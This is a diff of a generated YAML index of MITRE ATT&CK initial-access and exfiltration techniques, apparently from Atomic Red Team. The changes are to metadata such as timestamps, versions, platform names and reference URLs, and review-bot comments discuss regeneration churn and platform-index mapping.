@@ -59494,7 +60423,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
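Review bot: the ACSC reference now points at a web.archive.org snapshot dated 2021-07-08 while "Retrieved October 19, 2020" is kept, which is acceptable for an archived original but leaves no record that the live cyber.gov.au url went away; the identical substitution is made for the copy of this reference under T1566.001 below, so at least both copies stay in agreement.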
@@ -59533,12 +60462,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59600,7 +60528,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -59617,7 +60545,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -59647,7 +60574,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59661,7 +60588,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -59724,12 +60650,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59804,7 +60729,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59818,19 +60743,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59856,7 +60780,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59911,7 +60835,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59974,11 +60897,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59993,6 +60915,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -60001,18 +60924,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
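Review bot: the swap at `x_mitre_platforms` (Azure AD, Office 365 and Google Workspace out; Office Suite and Identity Provider in) changes what any platform-specific index contains, not just what this technique lists. An index whose technique selection is keyed on the old platform names will silently stop including T1078.001 and the other techniques renamed the same way in this patch (T1566, T1078, T1078.004, T1567, T1048, T1537 and more below). This patch also touches `atomics/Indexes/iaas_azure-index.yaml`, so platform-specific indexes are in scope: confirm the generator's platform-to-index mapping was updated to the new names in the same change, and that `Identity Provider` and `Office Suite` get index files of their own if the old ones are being retired.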
@@ -60044,14 +60967,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
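Review bot: the removal of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` at the end of the T1078.001 object is a move, not a deletion; the two keys reappear earlier in the same object as the `+ x_mitre_attack_spec_version: 3.2.0` and `+ x_mitre_modified_by_ref` lines in the two preceding hunks. Key order is being taken from the upstream JSON instead of being normalized, so every regeneration will churn like this and hide the real changes (the platform swap and the 1.3 to 1.4 bump). Have the generator emit keys in a fixed, e.g. sorted, order. The same churn appears in the T1199, T1078 and T1078.004 hunks below.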
@@ -60062,6 +60982,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -60070,22 +60995,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -60110,36 +61031,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
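Review bot: the only content change in this description is the added thread-hijacking clause ending in `(Citation: phishing-krebs)`; the rest of the hunk is the scalar flipping from a double-quoted folded string to a `|-` literal block, which rewrites every line and buries the one-sentence edit. If the serializer style change was intentional, say so in the commit; if not, pin the dumper's string style so descriptions do not flip format between regenerations. The `phishing-krebs` key does get a matching `source_name` entry in the references hunk further down, so the new citation resolves.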
@@ -60168,9 +61072,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -60188,7 +61092,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -60226,11 +61134,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60247,7 +61154,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -60257,7 +61163,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60266,19 +61172,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -60326,11 +61230,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60350,10 +61255,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
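Review bot: unlike the other platform hunks in this patch, this one narrows scope rather than renaming: `Office 365`, `SaaS` and `Google Workspace` are removed and only `Identity Provider` is added, with no `Office Suite`. That is consistent with a deliberate upstream re-scoping of Spearphishing Voice (version 1.0 to 1.1), but it also means the technique drops out of any SaaS-keyed index, so confirm it matches the upstream data rather than a partial merge. The T1189 hunk below makes the same SaaS-to-Identity Provider move.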
@@ -60386,7 +61289,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -60425,7 +61327,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
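Review bot: `modified` moves backwards here, from 2022-05-24 to 2022-04-28, with no other field in the object changing, and the same happens below for T1200, T1029, T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030, T1052, T1048.003 and, in the Azure index, T1055.011 and T1205.002. The old values cluster on a few shared `.188Z` timestamps (`14:00:00.188Z`, `14:49:39.188Z`), i.e. bulk updates, while the new values are earlier and distinct, which points to the index having been regenerated from a different STIX bundle than last time. That is not necessarily wrong, but anything that diffs on `modified` to detect technique changes will see regressions; name the ATT&CK release and bundle the index was built from in the commit message.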
@@ -60440,7 +61342,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -60520,11 +61421,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60580,11 +61480,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -60645,8 +61544,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -60674,13 +61573,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60720,8 +61618,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60729,13 +61629,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -60766,14 +61666,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60840,11 +61737,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60896,15 +61792,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60928,10 +61823,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -60950,13 +61844,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60995,9 +61888,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -61047,7 +61939,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -61067,7 +61958,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61087,8 +61978,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
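Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, and nothing re-adds it, so after this change T1029 carries no `x_mitre_attack_spec_version` at all. The same loss applies to T1011.001, T1048.001, T1048.002, T1052.001, T1030, T1052 and T1055.011 below, exactly the objects whose `modified` also moved backwards, while every other technique in the file keeps the field or bumps it to 3.2.0. The result is an index where the field is present for some techniques and absent for others; either the generator should backfill it consistently or the regeneration should use the source bundle that carries it.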
@@ -61135,7 +62024,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
